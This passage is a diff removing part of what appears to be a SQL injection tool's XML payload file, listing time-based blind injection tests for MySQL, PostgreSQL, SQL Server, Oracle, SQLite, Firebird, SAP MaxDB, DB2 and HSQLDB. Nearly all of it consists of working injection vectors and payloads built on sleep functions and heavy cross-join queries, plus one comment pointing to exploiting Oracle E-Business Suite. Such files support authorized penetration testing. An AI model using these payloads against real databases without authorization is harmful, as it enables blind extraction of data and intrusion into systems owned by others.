-        <vector>AND [RANDNUM]=(SELECT COUNT(*) FROM SYSIBM.SYSTABLES AS T1,SYSIBM.SYSTABLES AS T2,SYSIBM.SYSTABLES AS T3 WHERE ([INFERENCE]))</vector>
-        <request>
-            <payload>AND [RANDNUM]=(SELECT COUNT(*) FROM SYSIBM.SYSTABLES AS T1,SYSIBM.SYSTABLES AS T2,SYSIBM.SYSTABLES AS T3)</payload>
-            <comment>--</comment>
-        </request>
-        <response>
-            <time>[DELAYED]</time>
-        </response>
-        <details>
-            <dbms>IBM DB2</dbms>
-        </details>
-    </test>
-    
-    <test>
-        <title>HSQLDB &gt;= 1.7.2 AND time-based blind (heavy query)</title>
-        <stype>5</stype>
-        <level>4</level>
-        <risk>2</risk>
-        <clause>1,2,3</clause>
-        <where>1</where>
-        <vector>AND '[RANDSTR]'=CASE WHEN ([INFERENCE]) THEN REPEAT(RIGHT(CHAR([RANDNUM]),0),[SLEEPTIME]000000000) ELSE '[RANDSTR]' END</vector>
-        <request>
-            <payload>AND '[RANDSTR]'=REPEAT(RIGHT(CHAR([RANDNUM]),0),[SLEEPTIME]000000000)</payload>
-        </request>
-        <response>
-            <time>[SLEEPTIME]</time>
-        </response>
-        <details>
-            <dbms>HSQLDB</dbms>
-            <dbms_version>&gt;= 1.7.2</dbms_version>
-        </details>
-    </test>
-
-    <test>
-        <title>HSQLDB &gt;= 1.7.2 AND time-based blind (heavy query - comment)</title>
-        <stype>5</stype>
-        <level>5</level>
-        <risk>2</risk>
-        <clause>1,2,3</clause>
-        <where>1</where>
-        <vector>AND '[RANDSTR]'=CASE WHEN ([INFERENCE]) THEN REPEAT(RIGHT(CHAR([RANDNUM]),0),[SLEEPTIME]000000000) ELSE '[RANDSTR]' END</vector>
-        <request>
-            <payload>AND '[RANDSTR]'=REPEAT(RIGHT(CHAR([RANDNUM]),0),[SLEEPTIME]000000000)</payload>
-            <comment>--</comment>
-        </request>
-        <response>
-            <time>[DELAYED]</time>
-        </response>
-        <details>
-            <dbms>HSQLDB</dbms>
-            <dbms_version>&gt;= 1.7.2</dbms_version>
-        </details>
-    </test>
-    
-    <test>
-        <title>HSQLDB &gt; 2.0 AND time-based blind (heavy query)</title>
-        <stype>5</stype>
-        <level>4</level>
-        <risk>2</risk>
-        <clause>1,2,3</clause>
-        <where>1</where>
-        <vector>AND '[RANDSTR]'=CASE WHEN ([INFERENCE]) THEN REPEAT(LEFT(CRYPT_KEY('AES',null),0),[SLEEPTIME]00000000) ELSE '[RANDSTR]' END</vector>
-        <request>
-            <payload>AND '[RANDSTR]'=REPEAT(LEFT(CRYPT_KEY('AES',null),0),[SLEEPTIME]00000000)</payload>
-        </request>
-        <response>
-            <time>[SLEEPTIME]</time>
-        </response>
-        <details>
-            <dbms>HSQLDB</dbms>
-            <dbms_version>&gt; 2.0</dbms_version>
-        </details>
-    </test>
-
-    <test>
-        <title>HSQLDB &gt; 2.0 AND time-based blind (heavy query - comment)</title>
-        <stype>5</stype>
-        <level>5</level>
-        <risk>2</risk>
-        <clause>1,2,3</clause>
-        <where>1</where>
-        <vector>AND '[RANDSTR]'=CASE WHEN ([INFERENCE]) THEN REPEAT(LEFT(CRYPT_KEY('AES',null),0),[SLEEPTIME]00000000) ELSE '[RANDSTR]' END</vector>
-        <request>
-            <payload>AND '[RANDSTR]'=REPEAT(LEFT(CRYPT_KEY('AES',null),0),[SLEEPTIME]00000000)</payload>
-            <comment>--</comment>
-        </request>
-        <response>
-            <time>[DELAYED]</time>
-        </response>
-        <details>
-            <dbms>HSQLDB</dbms>
-            <dbms_version>&gt; 2.0</dbms_version>
-        </details>
-    </test>
-    <!-- TODO: if possible, add payload for Microsoft Access -->
-    <!-- End of AND time-based blind tests -->
-
-
-    <!-- OR time-based blind tests -->
-    <test>
-        <title>MySQL &gt; 5.0.11 OR time-based blind</title>
-        <stype>5</stype>
-        <level>2</level>
-        <risk>3</risk>
-        <clause>1,2,3</clause>
-        <where>2</where>
-        <vector>OR [RANDNUM]=IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM])</vector>
-        <request>
-            <payload>OR [RANDNUM]=SLEEP([SLEEPTIME])</payload>
-        </request>
-        <response>
-            <time>[SLEEPTIME]</time>
-        </response>
-        <details>
-            <dbms>MySQL</dbms>
-            <dbms_version>&gt; 5.0.11</dbms_version>
-        </details>
-    </test>
-
-    <test>
-        <title>MySQL &lt; 5.0.12 OR time-based blind (heavy query)</title>
-        <stype>5</stype>
-        <level>4</level>
-        <risk>3</risk>
-        <clause>1,2,3</clause>
-        <where>2</where>
-        <vector>OR [RANDNUM]=IF(([INFERENCE]),BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]')),[RANDNUM])</vector>
-        <request>
-            <payload>OR [RANDNUM]=BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]'))</payload>
-        </request>
-        <response>
-            <time>[DELAYED]</time>
-        </response>
-        <details>
-            <dbms>MySQL</dbms>
-        </details>
-    </test>
-
-    <test>
-        <title>PostgreSQL &gt; 8.1 OR time-based blind</title>
-        <stype>5</stype>
-        <level>3</level>
-        <risk>3</risk>
-        <clause>1,2,3</clause>
-        <where>2</where>
-        <vector>OR [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT [RANDNUM] FROM PG_SLEEP([SLEEPTIME])) ELSE [RANDNUM] END)</vector>
-        <request>
-            <payload>OR [RANDNUM]=(SELECT [RANDNUM] FROM PG_SLEEP([SLEEPTIME]))</payload>
-        </request>
-        <response>
-            <time>[SLEEPTIME]</time>
-        </response>
-        <details>
-            <dbms>PostgreSQL</dbms>
-            <dbms_version>&gt; 8.1</dbms_version>
-        </details>
-    </test>
-
-    <test>
-        <title>PostgreSQL OR time-based blind (heavy query)</title>
-        <stype>5</stype>
-        <level>4</level>
-        <risk>3</risk>
-        <clause>1,2,3</clause>
-        <where>2</where>
-        <vector>OR [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM GENERATE_SERIES(1,[SLEEPTIME]000000)) ELSE [RANDNUM] END)</vector>
-        <request>
-            <payload>OR [RANDNUM]=(SELECT COUNT(*) FROM GENERATE_SERIES(1,[SLEEPTIME]000000))</payload>
-        </request>
-        <response>
-            <time>[DELAYED]</time>
-        </response>
-        <details>
-            <dbms>PostgreSQL</dbms>
-        </details>
-    </test>
-
-    <test>
-        <title>Microsoft SQL Server/Sybase OR time-based blind (heavy query)</title>
-        <stype>5</stype>
-        <level>3</level>
-        <risk>3</risk>
-        <clause>1,2,3</clause>
-        <where>2</where>
-        <vector>OR [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) ELSE [RANDNUM] END)</vector>
-        <request>
-            <payload>OR [RANDNUM]=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7)</payload>
-        </request>
-        <response>
-            <time>[DELAYED]</time>
-        </response>
-        <details>
-            <dbms>Microsoft SQL Server</dbms>
-            <dbms>Sybase</dbms>
-            <os>Windows</os>
-        </details>
-    </test>
-
-    <test>
-        <title>Oracle OR time-based blind</title>
-        <stype>5</stype>
-        <level>3</level>
-        <risk>3</risk>
-        <clause>1,2,3</clause>
-        <where>2</where>
-        <vector>OR [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME]) ELSE [RANDNUM] END)</vector>
-        <request>
-            <payload>OR [RANDNUM]=DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME])</payload>
-        </request>
-        <response>
-            <time>[SLEEPTIME]</time>
-        </response>
-        <details>
-            <dbms>Oracle</dbms>
-        </details>
-    </test>
-
-    <test>
-        <title>Oracle OR time-based blind (heavy query)</title>
-        <stype>5</stype>
-        <level>4</level>
-        <risk>3</risk>
-        <clause>1,2,3</clause>
-        <where>2</where>
-        <vector>OR [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) ELSE [RANDNUM] END)</vector>
-        <request>
-            <payload>OR [RANDNUM]=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5)</payload>
-        </request>
-        <response>
-            <time>[DELAYED]</time>
-        </response>
-        <details>
-            <dbms>Oracle</dbms>
-        </details>
-    </test>
-
-    <test>
-        <title>SQLite &gt; 2.0 OR time-based blind (heavy query)</title>
-        <stype>5</stype>
-        <level>4</level>
-        <risk>3</risk>
-        <clause>1</clause>
-        <where>2</where>
-        <vector>OR [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB([SLEEPTIME]00000000/2))))) ELSE [RANDNUM] END)</vector>
-        <request>
-            <payload>OR [RANDNUM]=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB([SLEEPTIME]00000000/2))))</payload>
-        </request>
-        <response>
-            <time>[DELAYED]</time>
-        </response>
-        <details>
-            <dbms>SQLite</dbms>
-            <dbms_version>&gt; 2.0</dbms_version>
-        </details>
-    </test>
-
-    <test>
-        <title>Firebird OR time-based blind (heavy query)</title>
-        <stype>5</stype>
-        <level>5</level>
-        <risk>3</risk>
-        <clause>1</clause>
-        <where>2</where>
-        <vector>OR [RANDNUM]=IIF(([INFERENCE]),(SELECT COUNT(*) FROM RDB$FIELDS AS T1,RDB$TYPES AS T2,RDB$COLLATIONS AS T3,RDB$FUNCTIONS AS T4),[RANDNUM])</vector>
-        <request>
-            <payload>OR [RANDNUM]=(SELECT COUNT(*) FROM RDB$FIELDS AS T1,RDB$TYPES AS T2,RDB$COLLATIONS AS T3,RDB$FUNCTIONS AS T4)</payload>
-        </request>
-        <response>
-            <time>[DELAYED]</time>
-        </response>
-        <details>
-            <dbms>Firebird</dbms>
-            <dbms_version>&gt;= 2.0</dbms_version>
-        </details>
-    </test>
-
-    <test>
-        <title>SAP MaxDB OR time-based blind (heavy query - comment)</title>
-        <stype>5</stype>
-        <level>4</level>
-        <risk>3</risk>
-        <clause>1,2,3</clause>
-        <where>2</where>
-        <vector>OR [RANDNUM]=(SELECT COUNT(*) FROM (SELECT * FROM DOMAIN.DOMAINS WHERE ([INFERENCE])) AS T1,(SELECT * FROM DOMAIN.COLUMNS WHERE ([INFERENCE])) AS T2,(SELECT * FROM DOMAIN.TABLES WHERE ([INFERENCE])) AS T3)</vector>
-        <request>
-            <payload>OR [RANDNUM]=(SELECT COUNT(*) FROM DOMAIN.DOMAINS AS T1,DOMAIN.COLUMNS AS T2,DOMAIN.TABLES AS T3)</payload>
-        </request>
-        <response>
-            <time>[DELAYED]</time>
-        </response>
-        <details>
-            <dbms>SAP MaxDB</dbms>
-        </details>
-    </test>
-
-    <test>
-        <title>IBM DB2 OR time-based blind (heavy query)</title>
-        <stype>5</stype>
-        <level>4</level>
-        <risk>3</risk>
-        <clause>1,2,3</clause>
-        <where>2</where>
-        <vector>OR [RANDNUM]=(SELECT COUNT(*) FROM SYSIBM.SYSTABLES AS T1,SYSIBM.SYSTABLES AS T2,SYSIBM.SYSTABLES AS T3 WHERE ([INFERENCE]))</vector>
-        <request>
-            <payload>OR [RANDNUM]=(SELECT COUNT(*) FROM SYSIBM.SYSTABLES AS T1,SYSIBM.SYSTABLES AS T2,SYSIBM.SYSTABLES AS T3)</payload>
-        </request>
-        <response>
-            <time>[DELAYED]</time>
-        </response>
-        <details>
-            <dbms>IBM DB2</dbms>
-        </details>
-    </test>
-    
-    <test>
-        <title>HSQLDB &gt;= 1.7.2 OR time-based blind (heavy query)</title>
-        <stype>5</stype>
-        <level>4</level>
-        <risk>2</risk>
-        <clause>1,2,3</clause>
-        <where>1</where>
-        <vector>OR '[RANDSTR]'=CASE WHEN ([INFERENCE]) THEN REPEAT(RIGHT(CHAR([RANDNUM]),0),[SLEEPTIME]000000000) ELSE '[RANDSTR]' END</vector>
-        <request>
-            <payload>OR '[RANDSTR]'=REPEAT(RIGHT(CHAR([RANDNUM]),0),[SLEEPTIME]000000000)</payload>
-        </request>
-        <response>
-            <time>[SLEEPTIME]</time>
-        </response>
-        <details>
-            <dbms>HSQLDB</dbms>
-            <dbms_version>&gt;= 1.7.2</dbms_version>
-        </details>
-    </test>
-
-    <test>
-        <title>HSQLDB &gt;= 1.7.2 OR time-based blind (heavy query - comment)</title>
-        <stype>5</stype>
-        <level>5</level>
-        <risk>2</risk>
-        <clause>1,2,3</clause>
-        <where>1</where>
-        <vector>OR '[RANDSTR]'=CASE WHEN ([INFERENCE]) THEN REPEAT(RIGHT(CHAR([RANDNUM]),0),[SLEEPTIME]000000000) ELSE '[RANDSTR]' END</vector>
-        <request>
-            <payload>OR '[RANDSTR]'=REPEAT(RIGHT(CHAR([RANDNUM]),0),[SLEEPTIME]000000000)</payload>
-            <comment>--</comment>
-        </request>
-        <response>
-            <time>[DELAYED]</time>
-        </response>
-        <details>
-            <dbms>HSQLDB</dbms>
-            <dbms_version>&gt;= 1.7.2</dbms_version>
-        </details>
-    </test>    
-    
-    <test>
-        <title>HSQLDB &gt; 2.0 OR time-based blind (heavy query)</title>
-        <stype>5</stype>
-        <level>4</level>
-        <risk>2</risk>
-        <clause>1,2,3</clause>
-        <where>1</where>
-        <vector>OR '[RANDSTR]'=CASE WHEN ([INFERENCE]) THEN REPEAT(LEFT(CRYPT_KEY('AES',null),0),[SLEEPTIME]00000000) ELSE '[RANDSTR]' END</vector>
-        <request>
-            <payload>OR '[RANDSTR]'=REPEAT(LEFT(CRYPT_KEY('AES',null),0),[SLEEPTIME]00000000)</payload>
-        </request>
-        <response>
-            <time>[SLEEPTIME]</time>
-        </response>
-        <details>
-            <dbms>HSQLDB</dbms>
-            <dbms_version>&gt; 2.0</dbms_version>
-        </details>
-    </test>
-
-    <test>
-        <title>HSQLDB &gt; 2.0 OR time-based blind (heavy query - comment)</title>
-        <stype>5</stype>
-        <level>5</level>
-        <risk>2</risk>
-        <clause>1,2,3</clause>
-        <where>1</where>
-        <vector>OR '[RANDSTR]'=CASE WHEN ([INFERENCE]) THEN REPEAT(LEFT(CRYPT_KEY('AES',null),0),[SLEEPTIME]00000000) ELSE '[RANDSTR]' END</vector>
-        <request>
-            <payload>OR '[RANDSTR]'=REPEAT(LEFT(CRYPT_KEY('AES',null),0),[SLEEPTIME]00000000)</payload>
-            <comment>--</comment>
-        </request>
-        <response>
-            <time>[DELAYED]</time>
-        </response>
-        <details>
-            <dbms>HSQLDB</dbms>
-            <dbms_version>&gt; 2.0</dbms_version>
-        </details>
-    </test>
-    <!-- TODO: if possible, add payload for Microsoft Access -->
-    <!-- End of OR time-based blind tests -->
-
-
-    <!-- Time-based blind tests - Parameter replace -->
-    <test>
-        <title>MySQL &gt;= 5.0 time-based blind - Parameter replace</title>
-        <stype>5</stype>
-        <level>3</level>
-        <risk>1</risk>
-        <clause>1,2,3</clause>
-        <where>3</where>
-        <vector>(SELECT (CASE WHEN ([INFERENCE]) THEN SLEEP([SLEEPTIME]) ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))</vector>
-        <request>
-            <payload>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN SLEEP([SLEEPTIME]) ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))</payload>
-        </request>
-        <response>
-            <time>[SLEEPTIME]</time>
-        </response>
-        <details>
-            <dbms>MySQL</dbms>
-            <dbms_version>&gt;= 5.0</dbms_version>
-        </details>
-    </test>
-
-    <test>
-        <title>MySQL &lt; 5.0 time-based blind - Parameter replace (heavy queries)</title>
-        <stype>5</stype>
-        <level>4</level>
-        <risk>2</risk>
-        <clause>1,2,3</clause>
-        <where>3</where>
-        <vector>(SELECT (CASE WHEN ([INFERENCE]) THEN (SELECT BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]'))) ELSE [RANDNUM]*(SELECT [RANDNUM] FROM mysql.db) END))</vector>
-        <request>
-            <payload>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN (SELECT BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]'))) ELSE [RANDNUM]*(SELECT [RANDNUM] FROM mysql.db) END))</payload>
-        </request>
-        <response>
-            <time>[DELAYED]</time>
-        </response>
-        <details>
-            <dbms>MySQL</dbms>
-        </details>
-    </test>
-
-    <test>
-        <title>MySQL time-based blind - Parameter replace (bool*int)</title>
-        <stype>5</stype>
-        <level>4</level>
-        <risk>1</risk>
-        <clause>1,2,3</clause>
-        <where>3</where>
-        <vector>([INFERENCE])*SLEEP([SLEEPTIME])</vector>
-        <request>
-            <payload>([RANDNUM]=[RANDNUM])*SLEEP([SLEEPTIME])</payload>
-        </request>
-        <response>
-            <time>[SLEEPTIME]</time>
-        </response>
-        <details>
-            <dbms>MySQL</dbms>
-        </details>
-    </test>
-
-    <test>
-        <title>MySQL time-based blind - Parameter replace (MAKE_SET)</title>
-        <stype>5</stype>
-        <level>5</level>
-        <risk>1</risk>
-        <clause>1,2,3</clause>
-        <where>3</where>
-        <vector>MAKE_SET([INFERENCE],SLEEP([SLEEPTIME]))</vector>
-        <request>
-            <payload>MAKE_SET([RANDNUM]=[RANDNUM],SLEEP([SLEEPTIME]))</payload>
-        </request>
-        <response>
-            <time>[SLEEPTIME]</time>
-        </response>
-        <details>
-            <dbms>MySQL</dbms>
-        </details>
-    </test>
-
-    <test>
-        <title>MySQL time-based blind - Parameter replace (ELT)</title>
-        <stype>5</stype>
-        <level>5</level>
-        <risk>1</risk>
-        <clause>1,2,3</clause>
-        <where>3</where>
-        <vector>ELT([INFERENCE],SLEEP([SLEEPTIME]))</vector>
-        <request>
-            <payload>ELT([RANDNUM]=[RANDNUM],SLEEP([SLEEPTIME]))</payload>
-        </request>
-        <response>
-            <time>[SLEEPTIME]</time>
-        </response>
-        <details>
-            <dbms>MySQL</dbms>
-        </details>
-    </test>
-
-    <test>
-        <title>PostgreSQL &gt; 8.1 time-based blind - Parameter replace</title>
-        <stype>5</stype>
-        <level>3</level>
-        <risk>1</risk>
-        <clause>1,2,3</clause>
-        <where>3</where>
-        <vector>(CASE WHEN ([INFERENCE]) THEN (SELECT [RANDNUM] FROM PG_SLEEP([SLEEPTIME])) ELSE [RANDNUM] END)</vector>
-        <request>
-            <payload>(SELECT [RANDNUM] FROM PG_SLEEP([SLEEPTIME]))</payload>
-        </request>
-        <response>
-            <time>[SLEEPTIME]</time>
-        </response>
-        <details>
-            <dbms>PostgreSQL</dbms>
-            <dbms_version>&gt; 8.1</dbms_version>
-        </details>
-    </test>
-
-    <test>
-        <title>PostgreSQL time-based blind - Parameter replace (heavy query)</title>
-        <stype>5</stype>
-        <level>4</level>
-        <risk>2</risk>
-        <clause>1,2,3</clause>
-        <where>3</where>
-        <vector>(CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM GENERATE_SERIES(1,[SLEEPTIME]000000)) ELSE [RANDNUM] END)</vector>
-        <request>
-            <payload>(SELECT COUNT(*) FROM GENERATE_SERIES(1,[SLEEPTIME]000000))</payload>
-        </request>
-        <response>
-            <time>[DELAYED]</time>
-        </response>
-        <details>
-            <dbms>PostgreSQL</dbms>
-        </details>
-    </test>
-
-    <test>
-        <title>Microsoft SQL Server/Sybase time-based blind - Parameter replace</title>
-        <stype>5</stype>
-        <level>3</level>
-        <risk>1</risk>
-        <clause>1,3</clause>
-        <where>3</where>
-        <vector>(SELECT (CASE WHEN ([INFERENCE]) THEN WAITFOR DELAY '0:0:[SLEEPTIME]' ELSE [RANDNUM]*(SELECT [RANDNUM] FROM master..sysdatabases) END))</vector>
-        <request>
-            <payload>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN WAITFOR DELAY '0:0:[SLEEPTIME]' ELSE [RANDNUM]*(SELECT [RANDNUM] FROM master..sysdatabases) END))</payload>
-        </request>
-        <response>
-            <time>[SLEEPTIME]</time>
-        </response>
-        <details>
-            <dbms>Microsoft SQL Server</dbms>
-            <dbms>Sybase</dbms>
-            <os>Windows</os>
-        </details>
-    </test>
-
-    <test>
-        <title>Microsoft SQL Server/Sybase time-based blind - Parameter replace (heavy queries)</title>
-        <stype>5</stype>
-        <level>4</level>
-        <risk>2</risk>
-        <clause>1,3</clause>
-        <where>3</where>
-        <vector>(SELECT (CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) ELSE [RANDNUM] END))</vector>
-        <request>
-            <payload>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN (SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) ELSE [RANDNUM] END))</payload>
-        </request>
-        <response>
-            <time>[DELAYED]</time>
-        </response>
-        <details>
-            <dbms>Microsoft SQL Server</dbms>
-            <dbms>Sybase</dbms>
-            <os>Windows</os>
-        </details>
-    </test>
-
-    <!-- Without parentesis because it never works with them, useful to exploit SQL injection in Oracle E-Business Suite Financials -->
-    <test>
-        <title>Oracle time-based blind - Parameter replace (DBMS_LOCK.SLEEP)</title>
-        <stype>5</stype>
-        <level>3</level>
-        <risk>0</risk>
-        <clause>1,3</clause>
-        <where>3</where>
-        <vector>BEGIN IF ([INFERENCE]) THEN DBMS_LOCK.SLEEP([SLEEPTIME]); ELSE DBMS_LOCK.SLEEP(0); END IF; END;</vector>
-        <request>
-            <payload>BEGIN IF ([RANDNUM]=[RANDNUM]) THEN DBMS_LOCK.SLEEP([SLEEPTIME]); ELSE DBMS_LOCK.SLEEP(0); END IF; END;</payload>
-        </request>
-        <response>
-            <time>[SLEEPTIME]</time>
-        </response>
-        <details>
-            <dbms>Oracle</dbms>
-        </details>
-    </test>
-
-    <test>
-        <title>Oracle time-based blind - Parameter replace (DBMS_PIPE.RECEIVE_MESSAGE)</title>
-        <stype>5</stype>
-        <level>3</level>
-        <risk>1</risk>
-        <clause>1,3</clause>
-        <where>3</where>
-        <vector>(SELECT (CASE WHEN ([INFERENCE]) THEN DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME]) ELSE [RANDNUM] END) FROM DUAL)</vector>
-        <request>
-            <payload>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME]) ELSE [RANDNUM] END) FROM DUAL)</payload>
-        </request>
-        <response>
-            <time>[SLEEPTIME]</time>
-        </response>
-        <details>
-            <dbms>Oracle</dbms>
-        </details>
-    </test>
-
-    <test>
-        <title>Oracle time-based blind - Parameter replace (heavy queries)</title>
-        <stype>5</stype>
-        <level>4</level>
-        <risk>2</risk>
-        <clause>1,3</clause>
-        <where>3</where>
-        <vector>(SELECT (CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) ELSE [RANDNUM] END) FROM DUAL)</vector>
-        <request>
-            <payload>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN (SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) ELSE [RANDNUM] END) FROM DUAL)</payload>
-        </request>
-        <response>
-            <time>[DELAYED]</time>
-        </response>
-        <details>
-            <dbms>Oracle</dbms>
-        </details>
-    </test>
-
-    <test>
-        <title>SQLite &gt; 2.0 time-based blind - Parameter replace (heavy query)</title>
-        <stype>5</stype>
-        <level>4</level>
-        <risk>2</risk>
-        <clause>1,2,3</clause>
-        <where>3</where>
-        <vector>(SELECT (CASE WHEN ([INFERENCE]) THEN (LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB([SLEEPTIME]00000000/2))))) ELSE [RANDNUM] END))</vector>
-        <request>
-            <payload>(SELECT LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB([SLEEPTIME]00000000/2)))))</payload>
-        </request>
-        <response>
-            <time>[DELAYED]</time>
-        </response>
-        <details>
-            <dbms>SQLite</dbms>
-            <dbms_version>&gt; 2.0</dbms_version>
-        </details>
-    </test>
-
-    <test>
-        <title>Firebird time-based blind - Parameter replace (heavy query)</title>
-        <stype>5</stype>
-        <level>5</level>
-        <risk>2</risk>
-        <clause>1,2,3</clause>
-        <where>3</where>
-        <vector>IIF(([INFERENCE]),(SELECT COUNT(*) FROM RDB$FIELDS AS T1,RDB$TYPES AS T2,RDB$COLLATIONS AS T3,RDB$FUNCTIONS AS T4),[RANDNUM])</vector>
-        <request>
-            <payload>(SELECT COUNT(*) FROM RDB$FIELDS AS T1,RDB$TYPES AS T2,RDB$COLLATIONS AS T3,RDB$FUNCTIONS AS T4)</payload>
-        </request>
-        <response>
-            <time>[DELAYED]</time>
-        </response>
-        <details>
-            <dbms>Firebird</dbms>
-            <dbms_version>&gt;= 2.0</dbms_version>
-        </details>
-    </test>
-
-    <test>
-        <title>SAP MaxDB time-based blind - Parameter replace (heavy query)</title>
-        <stype>5</stype>
-        <level>5</level>
-        <risk>2</risk>
-        <clause>1,3</clause>
-        <where>3</where>
-        <vector>(SELECT COUNT(*) FROM (SELECT * FROM DOMAIN.DOMAINS WHERE ([INFERENCE])) AS T1,(SELECT * FROM DOMAIN.COLUMNS WHERE ([INFERENCE])) AS T2,(SELECT * FROM DOMAIN.TABLES WHERE ([INFERENCE])) AS T3)</vector>
-        <request>
-            <payload>(SELECT COUNT(*) FROM DOMAIN.DOMAINS AS T1,DOMAIN.COLUMNS AS T2,DOMAIN.TABLES AS T3)</payload>
-        </request>
-        <response>
-            <time>[DELAYED]</time>
-        </response>
-        <details>
-            <dbms>SAP MaxDB</dbms>
-        </details>
-    </test>
-
-    <test>
-        <title>IBM DB2 time-based blind - Parameter replace (heavy query)</title>
-        <stype>5</stype>
-        <level>5</level>
-        <risk>2</risk>
-        <clause>1,2,3</clause>
-        <where>3</where>
-        <vector>(SELECT COUNT(*) FROM SYSIBM.SYSTABLES AS T1,SYSIBM.SYSTABLES AS T2,SYSIBM.SYSTABLES AS T3 WHERE ([INFERENCE]))</vector>
-        <request>
-            <payload>(SELECT COUNT(*) FROM SYSIBM.SYSTABLES AS T1,SYSIBM.SYSTABLES AS T2,SYSIBM.SYSTABLES AS T3)</payload>
-        </request>
-        <response>
-            <time>[DELAYED]</time>
-        </response>
-        <details>
-            <dbms>IBM DB2</dbms>
-        </details>
-    </test>
-    
-    <!-- Untested -->
-    <test>
-        <title>HSQLDB &gt;= 1.7.2 time-based blind - Parameter replace (heavy query)</title>
-        <stype>5</stype>
-        <level>4</level>
-        <risk>2</risk>
-        <clause>1,2,3</clause>
-        <where>1</where>
-        <vector>(SELECT (CASE WHEN ([INFERENCE]) THEN REPEAT(RIGHT(CHAR([RANDNUM]),0),[SLEEPTIME]00000000) ELSE '[RANDSTR]' END) FROM INFORMATION_SCHEMA.SYSTEM_USERS)</vector>
-        <request>
-            <payload>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN REPEAT(RIGHT(CHAR([RANDNUM]),0),[SLEEPTIME]00000000) ELSE '[RANDSTR]' END) FROM INFORMATION_SCHEMA.SYSTEM_USERS)</payload>
-        </request>
-        <response>
-            <time>[SLEEPTIME]</time>
-        </response>
-        <details>
-            <dbms>HSQLDB</dbms>
-            <dbms_version>&gt;= 1.7.2</dbms_version>
-        </details>
-    </test>
-
-    <test>
-        <title>HSQLDB &gt; 2.0 time-based blind - Parameter replace (heavy query)</title>
-        <stype>5</stype>
-        <level>5</level>
-        <risk>2</risk>
-        <clause>1,2,3</clause>
-        <where>1</where>
-        <vector>(SELECT (CASE WHEN ([INFERENCE]) THEN REPEAT(LEFT(CRYPT_KEY('AES',null),0),[SLEEPTIME]00000000) ELSE '[RANDSTR]' END) FROM (VALUES(0)))</vector>
-        <request>
-            <payload>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN REPEAT(LEFT(CRYPT_KEY('AES',null),0),[SLEEPTIME]00000000) ELSE '[RANDSTR]' END) FROM (VALUES(0)))</payload>
-        </request>
-        <response>
-            <time>[SLEEPTIME]</time>
-        </response>
-        <details>
-            <dbms>HSQLDB</dbms>
-            <dbms_version>&gt; 2.0</dbms_version>
-        </details>
-    </test>
-    <!-- End of time-based blind tests - Parameter replace -->
-
-
-    <!-- Time-based blind tests - GROUP BY and ORDER BY clauses -->
-    <test>
-        <title>MySQL &gt;= 5.0.11 time-based blind - GROUP BY and ORDER BY clauses</title>
-        <stype>5</stype>
-        <level>3</level>
-        <risk>1</risk>
-        <clause>2,3</clause>
-        <where>1</where>
-        <vector>,(SELECT (CASE WHEN ([INFERENCE]) THEN SLEEP([SLEEPTIME]) ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))</vector>
-        <request>
-            <payload>,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN SLEEP([SLEEPTIME]) ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))</payload>
-        </request>
-        <response>
-            <time>[SLEEPTIME]</time>
-        </response>
-        <details>
-            <dbms>MySQL</dbms>
